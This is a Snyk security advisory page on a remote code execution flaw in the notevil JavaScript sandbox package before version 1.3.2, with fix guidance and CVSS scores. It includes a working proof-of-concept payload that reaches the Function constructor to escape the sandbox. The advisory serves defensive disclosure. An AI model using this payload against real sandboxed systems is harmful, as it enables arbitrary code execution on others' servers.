Homepage
About Snyk

Remote Code Execution (RCE) Affecting notevil package, versions <1.3.2

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    Exploit Maturity
    Proof of concept

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-NOTEVIL-467405
  • published 20 Sep 2019
  • disclosed 29 Jul 2019
  • credit Alan S Wang
Report a new vulnerability Found a mistake?

Introduced: 29 Jul 2019

CVE NOT AVAILABLE CWE-693 Open this link in a new tab

How to fix?

Upgrade notevil to version 1.3.2 or higher.

Overview

notevil is a module uses esprima to parse the javascript AST then walks each node and evaluates the result **Note:**This package has been deprecated.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). The package fails to prevent access to the Function constructor by not checking the return values of function calls. This allows attackers to access the Function prototype's constructor leading to the attacker being able to escape the sandbox leading to remote code execution.

Example payload

var safeEval = require('notevil') var input = "" + "function fn() {};" + "var constructorProperty = Object.getOwnPropertyDescriptors(fn.__proto__).constructor;" + "var properties = Object.values(constructorProperty);" + "properties.pop();" + "properties.pop();" + "properties.pop();" + "var Function = properties.pop();" + "(Function('return this'))()"; safeEval(input)

CVSS Scores

version 3.1
Expand this section

Snyk

Recommended
5.3 medium
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    High
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    Required
  • Scope (S)
    Unchanged
  • Confidentiality (C)
    None
  • Integrity (I)
    None
  • Availability (A)
    High